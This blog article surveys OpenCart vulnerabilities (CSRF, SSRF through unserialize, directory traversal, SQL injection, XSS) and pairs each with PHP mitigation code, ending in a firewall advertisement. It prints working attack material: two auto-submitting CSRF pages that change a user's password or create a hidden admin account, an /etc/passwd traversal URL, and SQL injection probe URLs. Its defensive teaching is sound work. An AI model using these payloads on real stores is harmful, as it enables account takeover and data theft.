OpenCart Security Issues - Top Attacks on OpenCart

OpenCart is a user-friendly, dynamic PHP-based open source online store management system. Being economical and open source, it is a boon for e-commerce startups. According to BuiltWith, 442,897 websites are currently using OpenCart for e-commerce activities. With fame, OpenCart has also gained the attention of hackers & cybercriminals. This article covers the OpenCart security issues the platform currently faces and discusses solutions to mitigate these security risks.

Attackers have exploited OpenCart frequently. Consequently, OpenCart security has become one of the most discussed topics among professionals who are assigned to secure this platform from attackers. Let us study some of the common OpenCart security issues, get to know their tell-tale signs and then discuss some of the preventive measures.

Related article – 4 Step Approach to OpenCart Security

1. OpenCart Security Issues: Cross-Site Request Forgery

OpenCart versions 1.4 (2010) and 3.0.2.0 (2018) were found to have a Cross-Site Request Forgery vulnerability, one of the more severe OpenCart security issues. In OpenCart version 3.0.2.0, the controller /upload/catalog/controller/account/password.php can be reached through a forged request: the attacker submits a request to index.php as index.php?route=account/password, which dispatches to the password controller, and because that controller does not verify that the request came from its own form, a logged-in user's password is changed to a value of the attacker's choosing. A sample page for this OpenCart security issue is:

<html>
<body>
  <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="password" value="CK01ck01" />
    <input type="hidden" name="confirm" value="CK01ck01" />
    <script>document.getElementById('post123').submit();</script>
  </form>
</body>
</html>

In OpenCart version 1.4 (2010), a CSRF vulnerability in index.php let remote attackers hijack the authentication of a logged-in administrator. By setting the POST request's route parameter to "user/user/insert", the attacker could make the administrator's browser create a new administrative account. For better understanding, a sample script is attached which performs CSRF by forging that POST request.

<html>
<head>
<title>OpenCart CSRF Vulnerability</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
function csrfInjection()
{
    var params = {
        'username'      : 'an_attacker',
        'firstname'     : 'attack',
        'lastname'      : 'user',
        'email'         : 'some.user (at) randomatackerdomain (dot) com [email concealed]',
        'user_group_id' : '1', // Default group id for administrator level is 1
        'password'      : 'test',
        'confirm'       : 'test',
        'status'        : '1'
    };

    var form = document.createElement("form");
    form.setAttribute("method", "post");
    form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

    for (var key in params)
    {
        var hiddenField = document.createElement("input");
        hiddenField.setAttribute("type", "hidden");
        hiddenField.setAttribute("name", key);
        hiddenField.setAttribute("value", params[key]);
        form.appendChild(hiddenField);
    }

    attack_result.document.body.appendChild(form);
    form.submit();
}
</script>
</head>
<body>
OpenCart CSRF Vulnerability
<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
<a href="#" onclick="csrfInjection();return false;">Add User</a>
<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>
</body>
</html>
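Both pages above work because the targeted controller accepts any POST that arrives with the victim's session cookie. The fix is a secret the attacker's page cannot read. The following is an added example, not OpenCart's own code, of a per-session anti-CSRF token on the password form that is verified before the password is touched; the function names, the csrf_token field name and the site origin are assumptions (OpenCart 3.x guards its admin routes with its own user_token parameter).

```php
<?php
// Added example (not OpenCart's own code): per-session anti-CSRF token for the
// account/password form. Function names, the 'csrf_token' field and the
// 'https://store.example' origin are assumptions.

// SameSite=Lax keeps the session cookie off cross-site POSTs such as the
// auto-submitting form shown above (array form requires PHP >= 7.3).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// Issue one random token per session and reuse it for every form in that session.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept a POST only if it carries the session's token (compared in constant time)
// and, when the browser sent an Origin header, that origin is our own site.
function csrf_check(array $post, array $server, string $site_origin): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $sent     = (string)($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $sent)) {
        return false;                       // missing, stale or guessed token
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $site_origin;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST, $_SERVER, 'https://store.example')) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // Only now validate password/confirm and update the account.
}

// Render the form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="index.php?route=account/password">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '">'
   . '<input type="password" name="password"> <input type="password" name="confirm">'
   . '<button type="submit">Save</button></form>';
```

The forged forms above carry no csrf_token field and, when a browser does send Origin, it names the attacker's page rather than the store, so csrf_check() fails on either count. The same token check applies to the admin user/user/insert route.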

Related article – Inside-out guide to OpenCart Security

2. OpenCart Security Issues: Server Side Request Forgery

Distinct from the CSRF issues above, a Server Side Request Forgery was also reported in 2014 in OpenCart 1.5.6.4. This OpenCart security issue was found in the Cart::getProducts method in system/library/cart.php. A sample vulnerable code snippet from the getProducts function of the Cart class is as follows:

foreach ($this->session->data['cart'] as $key => $quantity) {
    $product = explode(':', $key);
    $product_id = $product[0];
    $stock = true;

    // Options
    if (!empty($product[1])) {
        // the second half of the cart key is fed to unserialize() unvalidated
        $options = unserialize(base64_decode($product[1]));
    } else {
        $options = array();
    }
    // ... remainder of the loop body omitted on the page
}

In this code snippet, unserialize is used to process the key values of the array stored in the "data['cart']" session variable without proper input validation. Those keys can be manipulated by an unauthenticated attacker via the $_POST['quantity'] parameter during an "update" request. This OpenCart security issue can be used to inject arbitrary PHP objects into the application scope and thus allows an attacker to conduct Server-Side Request Forgery (SSRF) attacks.
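The root cause is that the cart key is attacker-influenced data and unserialize() will instantiate whatever class the blob names. The following is an added example, not OpenCart's code, that builds and parses cart keys without unserialize(): options travel as JSON, product and option ids are whitelisted as integers, and any legacy serialized blob is read with object instantiation disabled. The function names are assumptions.

```php
<?php
// Added example, not OpenCart's code: cart keys as "product_id:base64(json)",
// parsed with json_decode() so no PHP object can ever be instantiated from them.

function cart_key(int $product_id, array $options): string {
    ksort($options);                                   // stable key for identical option sets
    return $product_id . ':' . base64_encode(json_encode($options, JSON_THROW_ON_ERROR));
}

// Returns ['product_id' => int, 'options' => array] or null for anything malformed.
function parse_cart_key(string $key): ?array {
    $parts = explode(':', $key, 2);
    if (!ctype_digit($parts[0])) {
        return null;                                   // product id must be all digits
    }
    $options = [];
    if (isset($parts[1]) && $parts[1] !== '') {
        $raw = base64_decode($parts[1], true);         // strict mode rejects stray characters
        if ($raw === false) {
            return null;
        }
        $decoded = json_decode($raw, true);            // assoc=true: arrays only, never objects
        if (!is_array($decoded)) {
            return null;
        }
        foreach ($decoded as $option_id => $value) {
            $scalar_or_list = is_scalar($value)
                || (is_array($value) && $value === array_filter($value, 'is_scalar'));
            if (!ctype_digit((string)$option_id) || !$scalar_or_list) {
                return null;                           // unknown shape: drop the whole key
            }
            $options[(int)$option_id] = $value;
        }
    }
    return ['product_id' => (int)$parts[0], 'options' => $options];
}

// If an old session still holds a PHP-serialized blob, forbid class instantiation
// outright; unknown classes become __PHP_Incomplete_Class with no magic methods run.
function parse_legacy_options(string $blob): array {
    $data = @unserialize(base64_decode($blob), ['allowed_classes' => false]);
    return is_array($data) ? $data : [];
}

// Constructed cart contents: a valid key and a tampered one.
$cart = [
    cart_key(42, [7 => 'red', 9 => ['S', 'M']]) => 1,
    '42:' . base64_encode('O:8:"stdClass":0:{}')    => 1,   // serialized object, not JSON
];
foreach ($cart as $key => $quantity) {
    $item = parse_cart_key($key);
    echo $item === null ? "rejected: $key\n" : "product {$item['product_id']} x$quantity\n";
}
```

The tampered key is rejected at json_decode() because a serialized PHP object is not valid JSON; even parse_legacy_options() would only yield an inert incomplete-class value from it.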


3. OpenCart Security Issues: Directory Traversal

In 2009, OpenCart v1.1.8 was reported as having a directory traversal vulnerability in its index.php file. This enabled a remote attacker to read files and folders outside the website directory. The attacker placed .. (dot dot) sequences in the route parameter, and index.php resolved them against the file system. A sample of the exploit for this vulnerability is as follows:

http://[site]/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00

In 2018, OpenCart 3.0.2.0 was reported to have a security issue pertaining to directory traversal. This version has a feature called "program extension upload". It comprises the following steps:

  1. Upload
  2. Install
  3. Unzip
  4. Move
  5. Xml
  6. Remove

Now, if the "Remove" step is skipped, arbitrary code can be executed. This happens because the attacker can discover the secret temporary directory name (containing 10 random digits) through a directory traversal attack involving language_info['code'].

In the same version, there is another directory traversal vulnerability in the editDownload function in admin/model/catalog/download.php, reached via admin/index.php?route=catalog/download/edit. As a consequence, the configuration file of your OpenCart website may be downloaded by the attacker, who may then tamper with it to disrupt your online business.
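Both traversal issues come down to user input being joined onto a file system path. The following is an added example, not OpenCart's code, of two helpers that reject such inputs: a route resolver that only accepts a strict character whitelist and then confirms with realpath() that the controller file stays under the controller directory, and a download resolver that accepts a bare filename only. CONTROLLER_DIR and DOWNLOAD_DIR are assumed names (OpenCart's own constants are DIR_APPLICATION and DIR_DOWNLOAD).

```php
<?php
// Added example, not OpenCart's code. CONTROLLER_DIR / DOWNLOAD_DIR are assumptions.

define('CONTROLLER_DIR', __DIR__ . '/catalog/controller');
define('DOWNLOAD_DIR',   __DIR__ . '/system/storage/download');

// True when $real is a file strictly inside $base (both already canonicalised).
function inside_dir(string $real, string $base): bool {
    return strpos($real, $base . DIRECTORY_SEPARATOR) === 0;
}

// Map ?route=dir/file[/method] to a controller file. Dots, NUL bytes, backslashes and
// percent signs never pass the whitelist, so "../" and "%00" fail before any file
// system call; realpath() then guards against symlinks pointing outside the base.
function resolve_route(string $route): ?string {
    if (!preg_match('~^[a-z0-9_]+/[a-z0-9_]+(?:/[a-z0-9_]+)?$~', $route)) {
        return null;
    }
    [$dir, $file] = explode('/', $route);             // optional method segment is ignored
    $real = realpath(CONTROLLER_DIR . '/' . $dir . '/' . $file . '.php');
    $base = realpath(CONTROLLER_DIR);
    if ($real === false || $base === false || !inside_dir($real, $base)) {
        return null;                                  // missing file, or escaped the base
    }
    return $real;
}

// Serve a stored download by its bare filename only: no path components,
// no dotfiles, and the canonical result must stay inside DOWNLOAD_DIR.
function resolve_download(string $filename): ?string {
    if ($filename === '' || $filename !== basename($filename) || $filename[0] === '.') {
        return null;
    }
    $real = realpath(DOWNLOAD_DIR . '/' . $filename);
    $base = realpath(DOWNLOAD_DIR);
    if ($real === false || $base === false || !inside_dir($real, $base)) {
        return null;
    }
    return $real;
}

// Constructed inputs shaped like the two reports above, plus one legitimate route.
foreach (['../../../../../../etc/passwd', 'account/password', 'account/password/save'] as $r) {
    printf("route %-40s -> %s\n", $r, resolve_route($r) ?? 'rejected');
}
printf("download %-25s -> %s\n", '../../config.php', resolve_download('../../config.php') ?? 'rejected');
```

The traversal-shaped inputs are rejected by the whitelist and the basename() comparison before anything touches the disk; a legitimate route is only returned when its controller file actually exists under CONTROLLER_DIR.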

4. OpenCart Security Issues: SQL Injection

One of the most common attacks that PHP-based websites face is SQL Injection. There are four OpenCart security issues based on SQL injection. The first was reported in 2009 in OpenCart v1.1.8 and allowed remote attackers to execute arbitrary SQL commands via the order parameter. It was a case of blind SQL injection and arose because the order parameter was not sanitized before use. The attacker could craft an ORDER clause and thereby view, add, modify or delete information in the back-end database of OpenCart. The information that could be revealed to an attacker included usernames, unsalted MD5 passwords, payment gateway credentials, etc.

Then in 2010, OpenCart v1.3.2 was again reported as having an SQL injection vulnerability. The page parameter passed to index.php was used in SQL without sanitization. Given below are some example URIs that were specially crafted to demonstrate this OpenCart security issue:

http://www.example1.org/index.php?route=product%2Fspecial&path=20&page='

http://www.example2.in/index.php?route=product%2Fspecial&path=20&page='

http://www.example3.com/index.php?route=product%2Fcategory&path=20&page=andres'"

In OpenCart 2.3.0.0 stores using the Amazon Order Tracking function, an SQL injection vulnerability was detected in upload/admin/model/openbay/amazon.php. This OpenCart security issue enabled remote authenticated administrators to execute arbitrary SQL commands via the courier_id parameter to openbay.php. A code snippet of the updateAmazonOrderTracking function, which takes courier_id as a parameter, follows:

// As shipped: courier_id and tracking_no are concatenated into the query unescaped
public function updateAmazonOrderTracking($order_id, $courier_id, $courier_from_list, $tracking_no)
{
    $this->db->query("UPDATE `" . DB_PREFIX . "amazon_order`
        SET `courier_id` = '" . $courier_id . "',
            `courier_other` = " . (int)!$courier_from_list . ",
            `tracking_no` = '" . $tracking_no . "'
        WHERE `order_id` = " . (int)$order_id);
}

// Patched form (the page shows both lines): both string parameters go through $this->db->escape()
public function updateAmazonOrderTracking($order_id, $courier_id, $courier_from_list, $tracking_no)
{
    $this->db->query("UPDATE `" . DB_PREFIX . "amazon_order`
        SET `courier_id` = '" . $this->db->escape($courier_id) . "',
            `courier_other` = " . (int)!$courier_from_list . ",
            `tracking_no` = '" . $this->db->escape($tracking_no) . "'
        WHERE `order_id` = " . (int)$order_id);
}

Thus, through this OpenCart Security vulnerability, an SQL injection could be performed and order details of another customer could be accessible to an attacker.
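The three injection points above (the order parameter, the page parameter and the courier_id/tracking_no strings) call for three different fixes, because an ORDER BY column cannot be bound as a parameter. The following is an added example, not OpenCart's code, that shows all three with PDO: a prepared statement for the order-tracking update, an integer filter for page, and a whitelist for the sort column. $pdo is an assumed PDO connection and the function names are assumptions; DB_PREFIX is the constant OpenCart itself uses for its table prefix.

```php
<?php
// Added example, not OpenCart's code. $pdo, the function names and the column
// whitelist are assumptions; DB_PREFIX is OpenCart's table-prefix constant.

defined('DB_PREFIX') || define('DB_PREFIX', 'oc_');

// courier_id and tracking_no are bound, never concatenated, so a quote in either
// value is stored as data instead of ending the SQL string literal.
function update_order_tracking(PDO $pdo, int $order_id, string $courier_id,
                               bool $courier_from_list, string $tracking_no): int {
    $sql = 'UPDATE `' . DB_PREFIX . 'amazon_order`
            SET `courier_id` = :courier_id, `courier_other` = :courier_other,
                `tracking_no` = :tracking_no
            WHERE `order_id` = :order_id';
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':courier_id',    $courier_id, PDO::PARAM_STR);
    $stmt->bindValue(':courier_other', $courier_from_list ? 0 : 1, PDO::PARAM_INT);
    $stmt->bindValue(':tracking_no',   $tracking_no, PDO::PARAM_STR);
    $stmt->bindValue(':order_id',      $order_id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// The page parameter is only ever an integer >= 1; anything else falls back to 1.
function page_param($value): int {
    $page = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $page === false ? 1 : $page;
}

// ORDER BY cannot take a bound parameter, so the request value is mapped onto a
// fixed set of column names and the direction onto ASC/DESC. Unknown input is
// replaced by the default, not echoed into the query.
function order_clause(string $sort, string $order): string {
    $allowed   = ['p.price' => 'p.price', 'p.sort_order' => 'p.sort_order', 'pd.name' => 'pd.name'];
    $column    = $allowed[$sort] ?? 'p.sort_order';
    $direction = strtoupper($order) === 'DESC' ? 'DESC' : 'ASC';
    return "ORDER BY $column $direction";
}

// Product listing with the validated page and sort parameters.
function list_products(PDO $pdo, array $get, int $per_page = 20): array {
    $offset = (page_param($get['page'] ?? 1) - 1) * $per_page;
    $sql = 'SELECT p.product_id, pd.name, p.price FROM `' . DB_PREFIX . 'product` p
            JOIN `' . DB_PREFIX . 'product_description` pd ON pd.product_id = p.product_id '
         . order_clause((string)($get['sort'] ?? ''), (string)($get['order'] ?? ''))
         . ' LIMIT :limit OFFSET :offset';
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':limit',  $per_page, PDO::PARAM_INT);
    $stmt->bindValue(':offset', $offset,   PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage with a live connection (emulated prepares off, so MySQL does the binding):
// $pdo = new PDO('mysql:host=localhost;dbname=opencart;charset=utf8mb4', 'user', 'pass',
//     [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]);
// update_order_tracking($pdo, 1001, "UPS' OR 1=1 -- ", false, 'TRK123');   // stored as plain text
// list_products($pdo, ['page' => "1'", 'sort' => 'x; DROP TABLE oc_product', 'order' => 'desc']);
```

In the commented usage, the quote inside the courier value is stored as data, the malformed page value falls back to 1, and the unknown sort column is replaced by p.sort_order, so none of the three inputs reaches the SQL text.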

Related article – How to prevent SQL Injection (SQLi) in Opencart 1.5.x/2.x/3.x

5. OpenCart Security Issues: Cross-Site Scripting

The first XSS OpenCart security issue was discovered in 2008 in OpenCart v0.7.7. Multiple cross-site scripting (XSS) vulnerabilities were reported in index.php, which let attackers inject web scripts or HTML through the firstname and search parameters. The cause was improper validation of user-supplied input by the index.php script. A remote attacker could exploit this with a specially crafted URL carrying the firstname or search parameter; the script then executes in the victim's browser as soon as the URL is opened, and the attacker can steal the victim's cookie-based authentication credentials.

In 2015, a similar XSS OpenCart security issue was reported in versions of OpenCart before v2.1.0.2. The vulnerability used the zone_id parameter to inject arbitrary HTML or script into index.php. The affected route and parameter are:

/opencart/index.php?route=account/address/add   (zone_id, sent via POST)

Through this vulnerability, an attacker could hijack a user’s session, change the logged in user’s password and invalidate the victim user’s session. Now, if you as an administrator are logged in to your OpenCart website, then imagine what a nightmarish experience it would be. The attacker will have full administrative privileges on your website.

In 2018, OpenCart Overclocked versions below 1.11.1 had a Cross-Site Scripting (XSS) vulnerability in user input that was not sanitized within a JavaScript function. This could lead to unauthorized actions, access to data, theft of session information and denial of service. The exploit consisted of malicious input passed in a GET parameter. The vulnerable line looks like this:

var token = "<?php echo $_GET['token']; ?>"; // the GET parameter is echoed straight into a JavaScript string, so a value containing alert(1) runs in the page
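Each of the three XSS issues above is an input landing in a different output context: HTML text (firstname), an HTML attribute (search, zone_id) and a JavaScript string literal (token). The following is an added example, not OpenCart's code, that emits those same inputs with an encoder matched to each context and turns zone_id into an integer before it is rendered at all. The helper names are assumptions, and the superglobals are read directly here where OpenCart would use $this->request.

```php
<?php
// Added example, not OpenCart's code: context-aware output encoding for the
// firstname/search, zone_id and token inputs. Helper names are assumptions.

// HTML body and attribute context: every character that can start a tag,
// an entity or close a quoted attribute is entity-encoded.
function html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// JavaScript string-literal context: JSON encoding yields a quoted literal, and the
// HEX flags turn <, >, &, ' and " into \uXXXX so "</script>" cannot end the block.
function js_string(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// zone_id is an id, so it is validated as an integer; non-numeric input never reaches the template.
function zone_id(array $post): int {
    $id = filter_var($post['zone_id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? 0 : $id;
}

$firstname = (string)($_GET['firstname'] ?? '');
$search    = (string)($_GET['search'] ?? '');
$token     = (string)($_GET['token'] ?? '');
?>
<p>Welcome, <?= html($firstname) ?></p>
<form method="post" action="index.php?route=account/address/add">
  <input type="text" name="search" value="<?= html($search) ?>">
  <input type="hidden" name="zone_id" value="<?= zone_id($_POST) ?>">
</form>
<script>
  // A quoted JSON literal: quotes, backslashes and angle brackets inside the token are escaped
  var token = <?= js_string($token) ?>;
</script>
```

With these encoders a token value such as the alert(1) payload above becomes an inert string assigned to the variable, and a firstname containing a tag is displayed as text rather than parsed as markup. Escaping is applied at the point of output, not at input, so the same stored value can be rendered safely in any of the three contexts.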

Related article – How to Prevent Cross-site Scripting (XSS) in Opencart 1.5.x, 2.x & 3.x

Conclusion: Combating OpenCart Security Issues

In all of these attacks, the vulnerability was caused by code that did not pay heed to data security. Hence, the following are some security measures that you should not ignore:

  • The website administrator should make a thorough check of the various areas of code that deal with user input.
  • They must ensure that whatever data is associated with the website is properly sanitized with functions and logic.
  • Data must be properly validated before it is passed to back-end servers.
  • The default account credentials should be changed.
  • The plugins, themes & templates that are being used by the website must be kept updated.

If you are finding it difficult to keep up with so many steps, then you can take professional help. For instance, Astra's Web Application Firewall is a great way to mitigate all these OpenCart security issues. Astra firewall is known to block CSRF, XSS, SQLi, OWASP Top 10, bad bots and 100+ other emerging threats. It also keeps a real-time check and fortifies your OpenCart store against different security issues and malicious attackers. Click here to get an Astra demo now!


For more articles on OpenCart security, you can visit this section of Astra blog and get some quality tips for your OpenCart website.


About The Author

Naman Rastogi

Naman is a Digital Marketer & Growth Hacker at Astra. A technology enthusiast with focused interest in website security.
